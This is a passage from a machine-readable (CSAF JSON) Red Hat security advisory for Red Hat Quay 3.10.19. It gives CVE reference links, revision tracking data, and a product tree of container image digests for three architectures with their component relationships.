"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27962",
"url": "https://access.redhat.com/security/cve/CVE-2026-27962"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5665.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Quay 3.10.19",
"tracking": {
"current_release_date": "2026-04-16T11:09:03+00:00",
"generator": {
"date": "2026-04-16T11:09:03+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5665",
"initial_release_date": "2026-03-24T18:02:58+00:00",
"revision_history": [
{
"date": "2026-03-24T18:02:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T18:03:04+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:03+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Quay 3.1",
"product": {
"name": "Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:quay:3.10::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Quay"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3A7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022275"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Afe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772739218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Acaa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-bundle@sha256%3Ae165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774022285"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Ade004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Ac0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2?arch=amd64\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3Aba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aedd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021695"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772726823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3Ad59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1772725047"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774021722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Af6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1773971077"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64"
},
